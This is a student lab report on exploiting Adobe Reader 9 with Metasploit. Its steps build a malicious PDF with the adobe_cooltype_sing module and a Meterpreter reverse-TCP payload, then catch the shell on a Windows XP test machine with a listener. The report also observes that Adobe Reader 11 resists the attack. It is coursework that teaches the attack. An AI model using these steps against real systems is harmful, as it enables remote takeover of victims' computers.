zoukankan      html  css  js  c++  java
  • Adobe9阅读器渗透攻击——20145301

    Adobe9阅读器渗透攻击

    实验步骤:
    • 在kali终端中开启msfconsole,输入命令use exploit/windows/fileformat/adobe_cooltype_sing,进入该漏洞模块的使用。

    • 使用命令set payload windows/meterpreter/reverse_tcp设置攻击有效载荷。

    • 输入命令show options显示我们需要在攻击前需要设置的属性

    • 输入命令

    • 输入exploit,生成pdf文件(在隐藏文件夹中/.msf/local/5301.pdf)将pdf复制到靶机里。(因为我自己的kail拖拽不了文件出来,又换到了老师的kail。。。)

    • 使用命令back退出当前模块,并使用use exploit/multi/handler新建一个监听模块。

    • 使用set payload windows/meterpreter/reverse_tcp建立一个反向连接。需要输入命令set LPORT 5301,端口监听一致。

    • 使用命令exploit开始攻击,在xp中打开pdf,攻击成功,查看xp靶机信息。

    • 但是,同样在xp adobe11下打开显示为“hello world”,尴尬的失效了,可见更新软件多么重要。
  • 相关阅读:
    WordCount的程序设计没写出来怎么办
    小程序分析
    程序单元测试
    Visual studio 2013安装
    四则运算源代码
    在VC环境下执行代码出现错误
    微点评微信软件
    软件工程学习
    查找抄袭文章
    软件附加题简答
  • 原文地址:https://www.cnblogs.com/5301z/p/6714475.html
Copyright © 2011-2022 走看看